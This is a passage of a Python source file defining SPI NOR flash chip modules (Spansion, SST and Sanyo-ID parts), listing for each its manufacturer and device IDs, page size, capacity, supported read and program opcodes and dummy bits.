        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL128L(SpiNorFlashModule):
    """Spansion "s25fl128l": 16 MiB SPI NOR flash with dual/quad and 4-byte-address
    opcodes, 256-byte pages, 8 dummy bits."""
    name = "s25fl128l"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x6018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class S25FL128S(SpiNorFlashModule):
    """Spansion "s25fl128s": 16 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl128s"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL128S0(SpiNorFlashModule):
    """Spansion "s25fl128s0": 16 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl128s0"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL128S1(SpiNorFlashModule):
    """Spansion "s25fl128s1": 16 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl128s1"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL129PXXXXXX1(SpiNorFlashModule):
    """Spansion "s25fl129p......1" (wildcard ordering-option pattern): 16 MiB
    SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl129p......1"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL129P0(SpiNorFlashModule):
    """Spansion "s25fl129p0": 16 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl129p0"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL129P1(SpiNorFlashModule):
    """Spansion "s25fl129p1": 16 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl129p1"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL132K(SpiNorFlashModule):
    """Spansion "s25fl132k": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl132k"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x4016
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25FL164K(SpiNorFlashModule):
    """Spansion "s25fl164k": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl164k"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x4017
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25FL204K(SpiNorFlashModule):
    """Spansion "s25fl204k": 512 KiB SPI NOR flash with dual I/O, 256-byte pages."""
    name = "s25fl204k"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x4013
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
    ]
    dummy_bits = 8
class S25FL208K(SpiNorFlashModule):
    """Spansion "s25fl208k": 1 MiB SPI NOR flash with dual I/O, 256-byte pages."""
    name = "s25fl208k"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x4014
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
    ]
    dummy_bits = 8
class S25FL216K(SpiNorFlashModule):
    """Spansion "s25fl216k": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl216k"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x4015
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL256L(SpiNorFlashModule):
    """Spansion "s25fl256l": 32 MiB SPI NOR flash with dual/quad and 4-byte-address
    opcodes, 256-byte pages, 8 dummy bits."""
    name = "s25fl256l"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x6019
    page_size = 256  # bytes
    total_pages = 131072
    total_size = page_size * total_pages  # 33554432 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class S25FL256S(SpiNorFlashModule):
    """Spansion "s25fl256s": 32 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl256s"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0219
    page_size = 256  # bytes
    total_pages = 131072
    total_size = page_size * total_pages  # 33554432 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL256SXXXXXX0(SpiNorFlashModule):
    """Spansion "s25fl256s......0" (wildcard ordering-option pattern): 32 MiB
    SPI NOR flash with 4-byte-address opcodes, 256-byte pages, 8 dummy bits."""
    name = "s25fl256s......0"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0219
    page_size = 256  # bytes
    total_pages = 131072
    total_size = page_size * total_pages  # 33554432 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class S25FL256S0(SpiNorFlashModule):
    """Spansion "s25fl256s0": 32 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl256s0"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0219
    page_size = 256  # bytes
    total_pages = 131072
    total_size = page_size * total_pages  # 33554432 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25FL256S1(SpiNorFlashModule):
    """Spansion "s25fl256s1": 32 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl256s1"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0219
    page_size = 256  # bytes
    total_pages = 131072
    total_size = page_size * total_pages  # 33554432 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL512S(SpiNorFlashModule):
    """Spansion "s25fl512s": 64 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl512s"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0220
    page_size = 256  # bytes
    total_pages = 262144
    total_size = page_size * total_pages  # 67108864 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FS512S(SpiNorFlashModule):
    """Spansion "s25fs512s": 64 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fs512s"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0220
    page_size = 256  # bytes
    total_pages = 262144
    total_size = page_size * total_pages  # 67108864 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25SL004A(SpiNorFlashModule):
    """Spansion "s25sl004a": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl004a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0212
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25SL008A(SpiNorFlashModule):
    """Spansion "s25sl008a": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl008a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0213
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25SL016A(SpiNorFlashModule):
    """Spansion "s25sl016a": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl016a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0214
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25SL032A(SpiNorFlashModule):
    """Spansion "s25sl032a": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl032a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0215
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25SL032P(SpiNorFlashModule):
    """Spansion "s25sl032p": 4 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25sl032p"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0215
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25SL064A(SpiNorFlashModule):
    """Spansion "s25sl064a": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl064a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0216
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25SL064P(SpiNorFlashModule):
    """Spansion "s25sl064p": 8 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25sl064p"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0216
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25SL12800(SpiNorFlashModule):
    """Spansion "s25sl12800": 16 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl12800"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25SL12801(SpiNorFlashModule):
    """Spansion "s25sl12801": 16 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25sl12801"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x2018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S70FL01GS(SpiNorFlashModule):
    """Spansion "s70fl01gs": 64 MiB (per addressable die) SPI NOR flash,
    256-byte pages, 8 dummy bits."""
    name = "s70fl01gs"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0221
    page_size = 256  # bytes
    total_pages = 262144
    total_size = page_size * total_pages  # 67108864 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25LF080(SpiNorFlashModule):
    """SST "sst25lf080": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25lf080"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0080
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25LF080A(SpiNorFlashModule):
    """SST "sst25lf080a": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25lf080a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0080
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF010(SpiNorFlashModule):
    """SST "sst25vf010": 128 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf010"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0049
    page_size = 256  # bytes
    total_pages = 512
    total_size = page_size * total_pages  # 131072 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF010A(SpiNorFlashModule):
    """SST "sst25vf010a": 128 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf010a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0049
    page_size = 256  # bytes
    total_pages = 512
    total_size = page_size * total_pages  # 131072 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF016B(SpiNorFlashModule):
    """SST "sst25vf016b": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf016b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2541
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25VF020(SpiNorFlashModule):
    """SST "sst25vf020": 256 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf020"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0043
    page_size = 256  # bytes
    total_pages = 1024
    total_size = page_size * total_pages  # 262144 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF020B(SpiNorFlashModule):
    """SST "sst25vf020b": 256 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf020b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x258c
    page_size = 256  # bytes
    total_pages = 1024
    total_size = page_size * total_pages  # 262144 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF032B(SpiNorFlashModule):
    """SST "sst25vf032b": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf032b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x254a
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25VF040(SpiNorFlashModule):
    """SST "sst25vf040": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf040"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0044
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF040B(SpiNorFlashModule):
    """SST "sst25vf040b": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf040b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x258d
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25VF040BXREMS(SpiNorFlashModule):
    """SST "sst25vf040b.rems" (REMS-ID variant entry): 512 KiB SPI NOR flash,
    256-byte pages, 8 dummy bits."""
    name = "sst25vf040b.rems"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x008d
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF064C(SpiNorFlashModule):
    """SST "sst25vf064c": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf064c"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x254b
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25VF080B(SpiNorFlashModule):
    """SST "sst25vf080b": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf080b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x258e
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25VF512(SpiNorFlashModule):
    """SST "sst25vf512": 64 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf512"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0048
    page_size = 256  # bytes
    total_pages = 256
    total_size = page_size * total_pages  # 65536 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25VF512A(SpiNorFlashModule):
    """SST "sst25vf512a": 64 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25vf512a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x0048
    page_size = 256  # bytes
    total_pages = 256
    total_size = page_size * total_pages  # 65536 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25WF010(SpiNorFlashModule):
    """SST "sst25wf010": 128 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf010"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2502
    page_size = 256  # bytes
    total_pages = 512
    total_size = page_size * total_pages  # 131072 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25WF020(SpiNorFlashModule):
    """SST "sst25wf020": 256 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf020"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2503
    page_size = 256  # bytes
    total_pages = 1024
    total_size = page_size * total_pages  # 262144 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25WF020A(SpiNorFlashModule):
    """Sanyo-ID "sst25wf020a": 256 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf020a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x1612
    page_size = 256  # bytes
    total_pages = 1024
    total_size = page_size * total_pages  # 262144 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25WF040(SpiNorFlashModule):
    """SST "sst25wf040": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf040"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2504
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25WF040B(SpiNorFlashModule):
    """Sanyo-ID "sst25wf040b": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf040b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x1613
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25WF080(SpiNorFlashModule):
    """SST "sst25wf080": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf080"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2505
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
